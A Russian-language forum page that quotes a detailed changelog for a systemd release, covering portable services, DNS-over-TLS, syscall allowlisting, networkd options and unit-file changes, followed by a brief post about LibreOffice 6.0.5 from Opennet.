Представлена экспериментальная поддержка переносимых сервисов ("Portable Services"), позволяющих создавать системные сервисы в виде самодостаточных контейнеров. Переносимый сервис поставляется в виде системного образа, но обрабатывается как обычный сервис. Из достоинств переносимых сервисов отмечается возможность упаковки одного или нескольких приложений, сервисов и связанных с ними зависимостей в отдельный образ, с возможностью запуска компонентов с применением дополнительной sandbox-изоляции.
При этом, в отличие от контейнеров переносимые сервисы не запускаются в отдельном изолированном окружении со своим PID 1, а представляют из себя часть системы (выполняются в текущем системном окружении), отделённую в независимую самодостаточную иерархию каталогов. Для управления переносимыми сервисами предложена утилита "portablectl" (/usr/lib/systemd/portablectl). Для создания образов можно применять любые инструменты для формирования начинки контейнеров, такие как "dnf --installroot", "debootstrap" и "mkosi";

В systemd-resolved добавлена поддержка резолвинга доменных имён с использованием механизма DNS-over-TLS, при котором применяется штатный протокол DNS (обычно используется сетевой порт 853), завёрнутый в шифрованный канал связи, организованный при помощи протокола TLS с проверкой валидности хоста через TLS/SSL-сертификаты, заверенные удостоверяющим центром. Для активации DNS-over-TLS следует явно выставить в настройках resolved.conf параметр "DNSOverTLS=opportunistic" (по умолчанию поддержка отключена до внесения оптимизаций, направленных на сокращение задержек из-за дополнительных накладных расходов по установке TLS-сеанса поверх TCP);
Реализован режим suspend-then-hibernate, при котором система вначале переходит в ждущий режим, но в случае непробуждения в течение определённого таймаута активируется и уходит в глубокий спящий режим;
Обеспечена возможность использования файлов подкачки, а не только разделов подкачки, для сохранения дампа памяти во время перехода в спящий режим;
Изменено наименование виртуальных сетевых интерфейсов, созданных с использованием технологий SR-IOV ( Single Root Input/Output Virtualization) и NPAR (NIC Partitioning), а также для устройств, PCI-контроллер которых не выставляет номер слота. Имена устройств SR-IOV теперь устанавливаются с учётом имени родительского сетевого интерфейса с добавлением суффикса "vN", где N - номер интерфейса. Все виртуальные устройства NPAR теперь именуются по единой схеме (ранее начиная с 9 устройства назначались имена ethN). Для PCI-устройств без номера слота выбирается имя в соответствии со схемой "net_id", вместо определяемых ядром имён ethN;
Все длительно работающие системные сервисы переведены по умолчанию на использование белого списка системных вызовов, т.е. если раньше был определён список блокируемых опасных системных вызовов, а все остальные вызовы были разрешены, то теперь задан список разрешённых вызовов, а все остальные запрещены;
В system.conf предложена новая настройка NoNewPrivileges, которая позволяет отключить получение новых привилегий (выставить флаг PR_SET_NO_NEW_PRIVS для PID 1), что не позволяет исполняемым файлам с setuid и выставленными capabilities менять свои привилегии;
Вывод systemctl и других утилит теперь включает escape-последовательности, позволяющие отобразить доступные для клика ссылки в разных терминалах (например в выводе "systemctl status" теперь можно кликнуть на имени юнита для вызова программы для его просмотра или редактирования);
В файлы ".network" в секцию [Route] добавлены новые опции IPv6MTUBytes и MTUBytes для явного выставления MTU для определённых маршрутов, добавлена опция "UserClass" для определения класса пользователя в DHCP, опции Multicast и AllMulticast для выставления для сетевого интерфейса флагов MULTICAST и ALLMULTI, а также новая секция "[CAN]" с настройками CAN-сетей;
В файлах ".link" появились опции RxChannels, TxChannels, OtherChannels и CombinedChannels для определения числа принимающих и передающих каналов;
В файлах ".netdev" появилась возможность создания интерфейсов "netdevsim";
В systemd-analyze добавлена новая команда "cat-config" для вывода содержимого любых файлов конфигурации, соответствующих маске. Например, "systemd-analyze cat-config systemd/system.conf" выдаст содержимое всех файлов конфигурации, которые обрабатываются при запуске процесса PID 1. В утилиты, подобные systemd-tmpfiles и systemd-sysusers, добавлена опция "--cat-config", позволяющая просмотреть все настройки, учтённые данными утилитами. Например, "systemd-tmpfiles --cat-config" покажет в одном месте все строки файлов в "tmpfiles.d/";
В systemd-nspawn добавлены опции: "--rlimit" для определения начальных лимитов ресурсов для процессов в контейнере, "--hostname" для переопределения имени хоста контейнера, "--no-new-privileges" для выставления флага PR_SET_NO_NEW_PRIVS (отключение suid и capabilities), "--oom-score-adjust" для корректировки поведения в случае нехватки памяти, "--cpu-affinity" для настройки привязки к ядрам CPU, "--resolv-conf" для управления обработкой /etc/resolv.conf, "--timezone" для управления обработкой /etc/localtime. В systemd-detect-virt добавлена опция "--list" для вывода всех известных виртуальных машин и контейнеров;
Изменена схема поиска файлов, переопределяющих параметры unit-файлов. Например, если раньше для юнита "foo-bar-baz.service" переопределения проверялись по маске "foo-bar-baz.service.d/*.conf", то теперь проверяются все совпадения до первого дефиса, т.е. подпадают "foo-bar-.service.d/*.conf" и "foo-.service.d/", что позволяет создавать переопределения настроек для типовых групп юнитов;


В systemd-logind.service убраны ограничения для сокетов AF_INET и AF_INET6 (убраны из настройки RestrictAddressFamilies), но данное изменение не повлияет на безопасность так как начиная с выпуска 235 для юнитов также выставляется дублирующая блокировка "IPAddressDeny=any" и изменение поведения может наблюдаться только в случае изменения настроек по умолчанию;
При указании нескольких настроек RestrictNamespaces в юните, данные настройки теперь объединяются (ранее действовало только последнее значение RestrictNamespaces);
При использовании для сервисных юнитов комбинации настроек OnFailure и Restart, обработчик сбоя больше не вызывается в случае автоматического перезапуска (ранее такое поведение было определено в документации, но на деле обработчик сбоя вызывался);
В systemd-tmpfiles добавлен вывод предупреждения в случае упоминания в файлах "tmpfiles.d/" каталога "/var/run/", вместо которого предлагается использовать каталог "/run";
Команды systemctl disable/unmask/preset/preset-all теперь запрещено использовать с опцией "--runtime", так как результат зачастую не тот, что ожидает пользователь. При выполнении "systemctl disable/unmask" сейчас возвращается состояние как сеансовых (runtime), так и постоянных настроек, т.е. удаляются символические ссылки, как в каталоге /run, так и в /etc;
В sd-boot добавлены новые настройки загрузчика, позволяющие опционально отключить поиск загрузочных разделов Windows и macOS и отображение в загрузочному меню режима reboot-into-firmware. Также можно изменить разрешение экрана при загрузке (например для HiDPI);
В systemd-resolved.service и systemd-networkd.service по умолчанию выставлена настройка DynamicUser=yes для работы с использованием динамически генерируемого идентификатора пользователя вместо заранее определённых системных пользователей;
Утилита systemd-resolve переименована в resolvectl, а интерфейс приведён в соответствие с другими утилитами *ctl, такими как systemctl и loginctl (для обеспечения обратной совместности утилита systemd-resolve сохранена). Кроме того, в утилиты resolvectl/systemd-resolve добавлены опции для совместимости с утилитой 'resolvconf', предлагаемой в Debian и FreeBSD;
В networkd в настройке ClientIdentifier теперь допустимо использовать опцию "duid-only", при которой клиент будет отправлять только идентификатор DUID;
В nss-systemd (NSS-модуль для glibc) добавлена поддержка перечисления (enumeration) динамических пользователей и групп (ранее поддерживался только маппинг UID/GID в имена и обратно);
В journald в настройке Compress теперь можно задать порог, при превышении которого будет использовано сжатие, а объекты меньше которого сохранятся как есть (ранее порог был жестко выставлен а 512 байт);
Добавлен новый сервис systemd-time-sync-wait.service, который откладывает запуск юнита time-sync.target на этапе загрузки до момента получения данных синхронизации точного времени по сети, что может оказаться полезным для систем без локальных часов;
Для юнитов реализованы три новых спецификатора: %T и %V для подстановки каталогов с временными файлами (/tmp и /var/tmp) и %E для каталога с настройками ( /etc для системных юнитов или $XDG_CONFIG_HOME для пользовательских юнитов);
В ExecStart теперь допускается использование относительных путей к исполняемым файлам (список путей в $PATH можно узнать через "systemd-path search-binaries-default");
Добавлено новое состояние загрузки юнитов - "bad-setting", выставляемого если юнит был загружен, но содержит мешающие запуску ошибки (например, отсутствуют настройки ExecStart и ExecStop);
В coredumpctl команда "gdb" переименована в "debug" для абстрагирования от типа отладчика (например, может быть использован lldb). Для выбора альтернативного отладчика добавлена опция "--debugger" и переменная окружения $SYSTEMD_DEBUGGER;
В timedatectl добавлена новая команда "show" для отображения свойств шины systemd-timedated, а также "timesync-status" для текущего состояния синхронизации времени по NTP и "show-timesync" для показа свойств шины systemd-timesyncd. В systemd-timedated добавлена обработка переменной окружения $SYSTEMD_TIMEDATED_NTP_SERVICES, в которой можно указать список имён юнитов NTP-клиентов;
В journalctl и systemctl добавлена опция "-o", при указании которой в каждой строке лога отображаются имена юнитов вместо тегов syslog, а даты указываются с учётом часового пояса;
Добавлен новый юнит "system-update-pre.target", определяющий предварительные действия по синхронизации перед установкой системных обновлений в offline-режиме;
В исполняемый файл systemd добавлена опция "--dump-bus-properties" для вывода всех свойств D-Bus;
Для юнитов добавлена настройка "PrivateMounts", при выставлении которой юнит запускается в отдельном собственном пространстве имён в файловой системе;
В настройку ConditionSecurity добавлен параметр "uefi-secureboot", который выставляется в значение "true" в случае загрузки в режиме UEFI Secure boot;
По умолчанию отключен sysctl "net.ipv4.tcp_ecn";
Добавлены новые документы CGROUP_DELEGATION.md, PORTABLE_SERVICES.md, CODE_QUALITY.md и BOOT_LOADER_SPECIFICATION.md."
(ц)


15
Цитировать
Организация The Document Foundation объявила о выходе LibreOffice 6.0.5, пятого корректирующего выпуска из семейства LibreOffice 6.0 "fresh". Версия 6.0.5 в первую очередь ориентирована на энтузиастов, опытных пользователей и тех, кто предпочитает самые свежие версии программного обеспечения, но при этом признана готовой для начала миграции с ветки 5.4 консервативных пользователей и предприятий. Готовые установочные пакеты подготовлены для платформ Linux, macOS и Windows. Обновление включает 96 исправлений(RC1, RC2).
Новость на Opennet.

Страницы: [1] 2 3 ... 11